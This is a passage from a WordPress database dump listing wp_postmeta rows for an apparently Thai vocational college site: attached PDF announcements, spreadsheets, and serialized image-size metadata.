speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29968, 12269, '_wp_attached_file', '2021/12/263819521_882027892503121_1573443646954724338_n.png'),
(29969, 12269, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:59:\"2021/12/263819521_882027892503121_1573443646954724338_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"263819521_882027892503121_1573443646954724338_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"263819521_882027892503121_1573443646954724338_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"263819521_882027892503121_1573443646954724338_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"263819521_882027892503121_1573443646954724338_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"263819521_882027892503121_1573443646954724338_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29970, 12271, '_edit_lock', '1639966469:14'),
(29971, 12271, '_edit_last', '14'),
(29972, 12272, '_wp_attached_file', '2021/12/20211215135926290.pdf'),
(29975, 12271, '_hide_featured', NULL),
(29978, 12274, '_edit_lock', '1639966579:14'),
(29979, 12274, '_edit_last', '14'),
(29980, 12275, '_wp_attached_file', '2021/12/ประกาศเจ้าหน้าที่-3-งาน.pdf'),
(29983, 12274, '_hide_featured', NULL),
(29988, 12278, '_edit_lock', '1640143723:14'),
(29989, 12278, '_edit_last', '14'),
(29990, 12279, '_wp_attached_file', '2021/12/ประกาศรับครูเลขานุการ.pdf'),
(29993, 12278, '_hide_featured', NULL),
(29997, 12282, '_wp_attached_file', '2021/12/รูปเล่มแผนงบประมาณ-2565.pdf'),
(30000, 12286, '_wp_attached_file', '2021/12/ประกาศรับสมัครพนักงานราชการ.pdf'),
(30013, 12290, '_edit_lock', '1641276766:14'),
(30014, 12290, '_edit_last', '14'),
(30015, 12291, '_wp_attached_file', '2021/12/ประกาศรับพนักงานราชการแก้ไข.pdf'),
(30016, 12292, '_wp_attached_file', '2021/12/ประกาศรับพนักงานราชการแก้ไข-1.pdf'),
(30019, 12290, '_hide_featured', NULL),
(30024, 12296, '_wp_attached_file', '2021/12/202112291723.pdf'),
(30029, 12298, '_wp_attached_file', '2021/12/แบบฟอร์มใบสมัครพนักงานราชการ.pdf'),
(30036, 12300, '_edit_lock', '1641361423:14'),
(30037, 12300, '_edit_last', '14'),
(30038, 12301, '_wp_attached_file', '2022/01/รับสมัครครู-IT.pdf'),
(30041, 12300, '_hide_featured', NULL),
(30046, 12305, '_wp_attached_file', '2022/01/รับสมัครเจ้าหน้าที่ธุรการ.pdf'),
(30052, 12307, '_edit_lock', '1641374291:14'),
(30053, 12307, '_edit_last', '14'),
(30054, 12308, '_wp_attached_file', '2022/01/รายชื่อมีสิทธิสอบเลขา.pdf'),
(30057, 12307, '_hide_featured', NULL),
(30063, 12311, '_edit_lock', '1641530914:14'),
(30064, 12311, '_edit_last', '14'),
(30065, 12312, '_wp_attached_file', '2022/01/ประกาศรับเจ้าหน้าที่-2-อัตรา.pdf'),
(30068, 12311, '_hide_featured', NULL),
(30075, 12314, '_wp_attached_file', '2021/12/Untitled-1.jpg'),
(30076, 12314, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:22:\"2021/12/Untitled-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled-1-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30077, 12315, '_wp_attached_file', '2021/12/นอก.jpg'),
(30078, 12315, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:21:\"2021/12/นอก.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"นอก-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"นอก-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"นอก-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"นอก-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"นอก-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30079, 12316, '_wp_attached_file', '2021/12/ใน.jpg'),
(30080, 12316, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:18:\"2021/12/ใน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ใน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ใน-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"ใน-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"ใน-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"ใน-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30081, 12317, '_edit_lock', '1641802245:14'),
(30082, 12317, '_edit_last', '14'),
(30083, 12318, '_wp_attached_file', '2022/01/ประกาศผลโควตาภายใน2565.pdf'),
(30084, 12319, '_wp_attached_file', '2022/01/ผลโควตาภายนอก2565.pdf'),
(30085, 12317, '_hide_featured', NULL),
(30086, 12321, '_edit_lock', '1641801857:14'),
(30087, 12321, '_edit_last', '14'),
(30088, 12321, '_hide_featured', NULL),
(30089, 12323, '_edit_lock', '1641786811:14'),
(30090, 12323, '_edit_last', '14'),
(30091, 12324, '_wp_attached_file', '2022/01/ข้อกำหนดแนวปฏิบัติ.pdf'),
(30092, 12323, '_hide_featured', NULL),
(30093, 12331, '_wp_attached_file', '2021/12/1.jpg'),
(30094, 12331, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:13:\"2021/12/1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"1-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30095, 12332, '_wp_attached_file', '2021/12/2.jpg'),
(30096, 12332, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:13:\"2021/12/2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"2-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30097, 12333, '_wp_attached_file', '2021/12/3.jpg'),
(30098, 12333, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:13:\"2021/12/3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"3-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30099, 12334, '_wp_attached_file', '2021/12/4.jpg'),
(30100, 12334, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1890;s:6:\"height\";i:591;s:4:\"file\";s:13:\"2021/12/4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:12:\"4-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"4-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"4-400x125.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30101, 12335, '_edit_lock', '1641902949:12'),
(30102, 12335, '_edit_last', '12'),
(30103, 12336, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวช-2565.xls'),
(30104, 12335, '_hide_featured', NULL),
(30106, 12339, '_edit_lock', '1641970581:12'),
(30107, 12339, '_edit_last', '12'),
(30108, 12340, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวส-2565.xls'),
(30109, 12339, '_hide_featured', NULL),
(30110, 12342, '_edit_lock', '1641900433:12'),
(30111, 12342, '_edit_last', '12'),
(30112, 12343, '_edit_lock', '1641788138:14'),
(30113, 12343, '_edit_last', '14'),
(30114, 12344, '_wp_attached_file', '2022/01/ตัวอย่างเอกสารมอบตัวโควตา-65.pdf'),
(30115, 12345, '_wp_attached_file', '2022/01/เอกสารการมอบตัวนักเรียน-นักศึกษา-โควตา-ปี.pdf'),
(30116, 12343, '_hide_featured', NULL),
(30117, 12342, '_hide_featured', NULL),
(30118, 12358, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวช-2565-แก้ไข.xls'),
(30119, 12361, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวส-2565-แก้ไข.xls'),
(30120, 12363, '_edit_lock', '1641795054:14'),
(30121, 12363, '_edit_last', '14'),
(30122, 12364, '_wp_attached_file', '2022/01/ประกาศครูเลขา.pdf'),
(30125, 12363, '_hide_featured', NULL),
(30130, 12367, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวส-2565-แก้ไข2.xls'),
(30131, 12369, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวช-2565-แก้ไข2.xls'),
(30132, 12371, '_wp_attached_file', '2022/01/ประกาศผลโควตาภายนอก2565แก้ไข.pdf'),
(30133, 12373, '_wp_attached_file', '2022/01/ประกาศผลโควตาภายใน2565แก้ไข.pdf'),
(30137, 12367, '_edit_lock', '1641874447:12'),
(30140, 12393, '_edit_lock', '1641888215:14'),
(30141, 12393, '_edit_last', '14'),
(30142, 12394, '_wp_attached_file', '2022/01/ประกาศพ้นสภาพไม่ลงทะเบียน.pdf'),
(30145, 12393, '_hide_featured', NULL),
(30150, 12397, '_wp_attached_file', '2022/01/บัตรลงทะเบียนเรียน-โควตา-ปวช-2565-แก้ไข2-1.xls'),
(30172, 12433, '_edit_lock', '1642149808:14'),
(30173, 12433, '_edit_last', '14'),
(30174, 12433, '_hide_featured', NULL),
(30175, 12437, '_edit_lock', '1642148899:14'),
(30176, 12437, '_edit_last', '14'),
(30177, 12437, '_hide_featured', NULL),
(30178, 12440, '_edit_lock', '1642149747:14'),
(30179, 12440, '_edit_last', '14'),
(30180, 12440, '_hide_featured', NULL),
(30181, 12445, '_edit_lock', '1642150779:14'),
(30182, 12445, '_edit_last', '14'),
(30183, 12446, '_wp_attached_file', '2022/01/ประกาศรับสมัคร-จนท..pdf'),
(30186, 12445, '_hide_featured', NULL),
(30191, 12451, '_edit_lock', '1642405400:14'),
(30192, 12451, '_edit_last', '14'),
(30193, 12452, '_edit_lock', '1642406120:14'),
(30194, 12452, '_edit_last', '14'),
(30195, 12453, '_wp_attached_file', '2022/01/ประกาศรายชื่อผู้มีสิทธประเมินครั้งที่1.pdf'),
(30198, 12452, '_hide_featured', NULL),
(30205, 12455, '_wp_attached_file', '2021/12/1642570446841.jpg'),
(30206, 12455, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1698;s:6:\"height\";i:858;s:4:\"file\";s:25:\"2021/12/1642570446841.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1642570446841-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1642570446841-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"1642570446841-768x388.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:388;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1642570446841-1024x517.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1642570446841-400x202.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30207, 12457, '_edit_lock', '1643007679:14'),
(30208, 12457, '_edit_last', '14'),
(30209, 12458, '_wp_attached_file', '2022/01/ประกาศรับพนักงานราชการแก้ไข.pdf'),
(30210, 12459, '_wp_attached_file', '2022/01/ประกาศรายชื่อครั้ง-2สัมภาษณ์.pdf'),
(30213, 12457, '_hide_featured', NULL),
(30217, 12462, '_edit_lock', '1643017522:14'),
(30218, 12462, '_edit_last', '14'),
(30219, 12463, '_wp_attached_file', '2022/01/ประกาศรายชื่อครูพิเศษสอนและ-จนท.pdf'),
(30222, 12462, '_hide_featured', NULL),
(30231, 12467, '_wp_attached_file', '2021/12/20220125_110325_0000.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(30232, 12467, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:32:\"2021/12/20220125_110325_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220125_110325_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220125_110325_0000-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220125_110325_0000-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220125_110325_0000-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220125_110325_0000-400x225.png\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30233, 12469, '_edit_lock', '1643181663:14'),
(30234, 12469, '_edit_last', '14'),
(30235, 12470, '_wp_attached_file', '2022/01/ประกาศรับสมัคร-จนท.-1.pdf'),
(30236, 12471, '_wp_attached_file', '2022/01/ประกาศรับเจ้าหน้าที่.pdf'),
(30239, 12469, '_hide_featured', NULL),
(30246, 12473, '_edit_lock', '1643338515:14'),
(30247, 12473, '_edit_last', '14'),
(30248, 12474, '_wp_attached_file', '2022/01/ประกาศรายชื่อผู้ผ่านการเลือกสรร.pdf'),
(30251, 12473, '_hide_featured', NULL),
(30256, 12476, '_wp_attached_file', '2021/12/FB_IMG_1643679438802.jpg'),
(30257, 12476, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1528;s:4:\"file\";s:32:\"2021/12/FB_IMG_1643679438802.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1643679438802-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1643679438802-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"FB_IMG_1643679438802-768x1087.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"FB_IMG_1643679438802-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1643679438802-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30258, 12479, '_wp_attached_file', '2021/12/20220201_140628_0000.png'),
(30259, 12479, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1528;s:4:\"file\";s:32:\"2021/12/20220201_140628_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220201_140628_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220201_140628_0000-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"20220201_140628_0000-768x1087.png\";s:5:\"width\";i:768;s:6:\"height\";i:1087;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220201_140628_0000-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220201_140628_0000-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30260, 12481, '_wp_attached_file', '2021/12/ไม่มีชื่อ-102_20220201143459.png'),
